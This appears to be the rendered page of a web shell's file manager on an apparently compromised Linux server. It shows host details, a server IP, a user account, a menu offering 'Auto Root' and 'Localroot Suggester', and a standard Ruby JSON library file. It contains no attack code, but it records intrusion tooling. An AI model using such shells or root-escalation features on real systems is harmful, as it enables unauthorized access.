Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.188
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby26 /
lib64 /
ruby /
2.6.0 /
json /
Delete
Unzip
Name
Size
Permission
Date
Action
add
[ DIR ]
drwxr-xr-x
2026-04-30 23:44
common.rb
14.98
KB
-rw-r--r--
2023-07-26 18:33
ext.rb
391
B
-rw-r--r--
2023-07-26 18:33
generic_object.rb
1.39
KB
-rw-r--r--
2023-07-26 18:33
version.rb
302
B
-rw-r--r--
2023-07-26 18:33
Save
Rename
require 'json/common' module JSON # This module holds all the modules/classes that implement JSON's # functionality as C extensions. module Ext require 'json/ext/parser' require 'json/ext/generator' $DEBUG and warn "Using Ext extension for JSON." JSON.parser = Parser JSON.generator = Generator end JSON_LOADED = true unless defined?(::JSON::JSON_LOADED) end